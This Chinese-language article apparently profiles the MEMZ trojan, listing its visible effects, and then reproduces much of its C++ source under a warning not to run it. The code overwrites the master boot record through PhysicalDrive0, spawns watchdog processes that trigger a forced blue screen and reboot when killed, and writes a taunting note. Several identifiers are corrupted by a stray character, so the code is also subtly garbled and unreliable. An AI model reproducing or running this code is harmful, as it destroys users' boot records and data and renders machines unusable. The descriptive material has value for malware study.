一、描述

彩虹猫病毒,又称MEMZ,是作者Leurak于2016年编写的特洛伊木马,来源于德国,主要由C++和汇编这两种编程语言编写,源文件的扩展名一般为.exe或.bat

MEMZ是一种运行于微软Windows操作系统的木马。它最初源于Danooct1的“观赏性恶意软件”系列。该木马拥有多个感染阶段,各阶段均由前一阶段自动触发,其中一些会延迟执行。它既能以.exe文件的形式运行,也能以批处理文件的形式运行;批处理版本的运行方式类似于压缩文件的自解压,即先释放出.exe文件再运行它。

二、效果

根据Leurak的描述,其感染过程包括:

  • 打开一个标题为“note”的txt文本文档,里面是英文“YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN. Your computer won't boot up again, so use it as long as you can! :D Trying to kill MEMZ will cause your system to be destroyed instantly, so don't try it :D ”
  • 随机打开(搜索)网页、应用程序
  • 鼠标指针的移动
  • 随机键盘输入
  • 错误的提示声效(依据操作系统而改变)
  • 颜色反转
  • 弹出消息框
  • 绘制错误图标
  • 大部分的文字会被反转(在Windows XP下开始按钮的文字也会被反转)
  • 对整个屏幕进行截屏(“隧道效果”)
  • 出现屏幕失灵的现象
  • MBR(主引导记录)被重写,分区表也可能被破坏

其他感染阶段(后续版本才增加的)

  • 随机的芯片音乐
  • 随机屏幕错位

三、源代码(请不要运行——如上所述,它会重写MBR并强制重启系统;我自己也没有试过)

int scrw, scrh;#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...
HFONT font;
HWND dialog;
#endifvoid main() {scrw = GetSystemMetrics(SM_CXSCREEN);scrh = GetSystemMetrics(SM_CYSCREEN);#ifndef CLEANint argc;LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);if (argc > 1) {if (!lstrcmpW(argv[1], L"/watchdog")) {CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);WNDCLASSEXA c;c.cbSize = sizeof(WNDCLASSEXA);c.lpfnWndProc = WindowProc;c.lpszClassName = "hax";c.style = 0;c.cbClsExtra = 0;c.cbWndExtra = 0;c.hInstance = NULL;c.hIcon = 0;c.hCursor = 0;c.hbrBackground = 0;c.lpszMenuName = NULL;c.hIconSm = 0;RegisterClassExA(&c);HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);MSG msg;while (GetMessage(&msg, NULL, 0, 0) > 0) {TranslateMessage(&msg);DispatchMessage(&msg);}}} else {// Another very ugly formattingif (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
This malware will harm your computer and makes it unusable.\r\n\
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
If you know what this malware does and are using a safe environment to test, \
press Yes to start it.\r\n\r\n\
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {ExitProcess(0);}wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);GetModuleFileName(NULL, fn, 8192);for (int i = 0; i < 5; i++)ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);SHELLEXECUTEINFO info;info.cbSize = sizeof(SHELLEXECUTEINFO);info.lpFile = fn;info.lpParameters = L"/main";info.fMask = SEE_MASK_NOCLOSEPROCESS;info.hwnd = NULL;info.lpVerb = NULL;info.lpDirectory = NULL;info.hInstApp = NULL;info.nShow = SW_SHOWDEFAULT;ShellExecuteEx(&info);SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);ExitProcess(0);}HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);if (drive == INVALID_HANDLE_VALUE)ExitProcess(2);unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);// Join the two code parts togetherint i = 0;for (; i < code1_len; i++)*(bootcode + i) = *(code1 + i);for (i = 0; i < code2_len; i++)*(bootcode + i + 0x1fe) = *(code2 + i);DWORD wb;if (!WriteFile(drive, bootcode, 65536, &wb, NULL))ExitProcess(3);CloseHandle(drive);HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);if (note == INVALID_HANDLE_VALUE)ExitProcess(4);if (!WriteFile(note, msg, msg_len, &wb, NULL))ExitProcess(5);CloseHandle(note);ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);for (int p = 0; p < nPayloads; p++) {Sleep(payloads[p].delay);CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);}for (;;) {Sleep(10000);}#else // CLEANInitCommonControls();dialog = NULL;LOGFONT lf;GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);font = CreateFont(lf.lfHeight, lf.lfWidth,lf.lfEscapement, lf.lfOrientation, lf.lfWeight,lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,lf.lfPitchAndFamily, 
lf.lfFaceName);WNDCLASSEX c;c.cbSize = sizeof(WNDCLASSEX);c.lpfnWndProc = WindowProc;c.lpszClassName = L"MEMZPanel";c.style = CS_HREDRAW | CS_VREDRAW;c.cbClsExtra = 0;c.cbWndExtra = 0;c.hInstance = NULL;c.hIcon = 0;c.hCursor = 0;c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);c.lpszMenuName = NULL;c.hIconSm = 0;RegisterClassEx(&c);RECT rect;rect.left = 0;rect.right = WINDOWWIDTH;rect.top = 0;rect.bottom = WINDOWHEIGHT;AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);for (int p = 0; p < nPayloads; p++) {payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,(p%COLUMNS)*喵NWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*喵NHEIGHT + SPACE*(p/COLUMNS+1), 喵NWIDTH, 喵NHEIGHT,mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);}SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);ShowWindow(mainWindow, SW_SHOW);UpdateWindow(mainWindow);CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);MSG msg;while (GetMessage(&msg, NULL, 0, 0) > 0) {if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {TranslateMessage(&msg);DispatchMessage(&msg);}}
#endif
}#ifndef CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {if (msg == WM_CLOSE || msg == WM_ENDSESSION) {killWindows();return 0;}return DefWindowProc(hwnd, msg, wParam, lParam);
}DWORD WINAPI watchdogThread(LPVOID parameter) {int oproc = 0;char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);Sleep(1000);for (;;) {HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);PROCESSENTRY32 proc;proc.dwSize = sizeof(proc);Process32First(snapshot, &proc);int nproc = 0;do {HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);GetProcessImageFileNameA(hProc, fn2, 512);if (!lstrcmpA(fn, fn2)) {nproc++;}CloseHandle(hProc);LocalFree(fn2);} while (Process32Next(snapshot, &proc));CloseHandle(snapshot);if (nproc < oproc) {killWindows();}oproc = nproc;Sleep(10);}
}void killWindows() {// Show cool MessageBoxesfor (int i = 0; i < 20; i++) {CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);Sleep(100);}killWindowsInstant();
}void killWindowsInstant() {// Try to force BSOD first// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...// This isn't even an exploit, it's just an undocumented feature.HMODULE ntdll = LoadLibraryA("ntdll");FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {BOOLEAN tmp1; DWORD tmp2;((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);}// If the computer is still running, do it the normal wayHANDLE token;TOKEN_PRIVILEGES privileges;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);privileges.PrivilegeCount = 1;privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);// The actual restartExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
}DWORD WINAPI ripMessageThread(LPVOID parameter) {HHOOK hook = SetWindowsHookEx(WH_C喵, msgBoxHook, 0, GetCurrentThreadId());MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);UnhookWindowsHookEx(hook);return 0;
}
#else // CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {PAINTSTRUCT ps;HDC hdc;if (msg == WM_ACTIVATE) {if (wParam == NULL)dialog = NULL;elsedialog = hwnd;} else if (msg == WM_DESTROY) {ExitProcess(0);} else if (msg == WM_COMMAND) {if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {for (int p = 0; p < nPayloads; p++) {if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);// Most ugly formatting EVERif (MessageBoxA(hwnd,"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
Do you still want to enable it?",
"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);}}}}} else if (msg == WM_PAINT) {hdc = BeginPaint(hwnd, &ps);SelectObject(hdc, font);LPWSTR str;LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);EndPaint(hwnd, &ps);} else {return DefWindowProc(hwnd, msg, wParam, lParam);}return 0;
}DWORD WINAPI keyboardThread(LPVOID lParam) {for (;;) {if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {enablePayloads = !enablePayloads;if (!enablePayloads) {RECT rect;HWND desktop = GetDesktopWindow();GetWindowRect(desktop, &rect);RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);EnumWindows(&CleanWindowsProc, NULL);} else {RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);}while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {Sleep(100);}} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {if (enablePayloads) {for (int p = 0; p < nPayloads; p++) {if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {payloads[p].delay = payloads[p].payloadFunction(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);}}}}Sleep(10);}return 0;
}BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {DWORD pid;if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {SendMessage(hwnd, WM_CLOSE, 0, 0);}return TRUE;
}
#endif
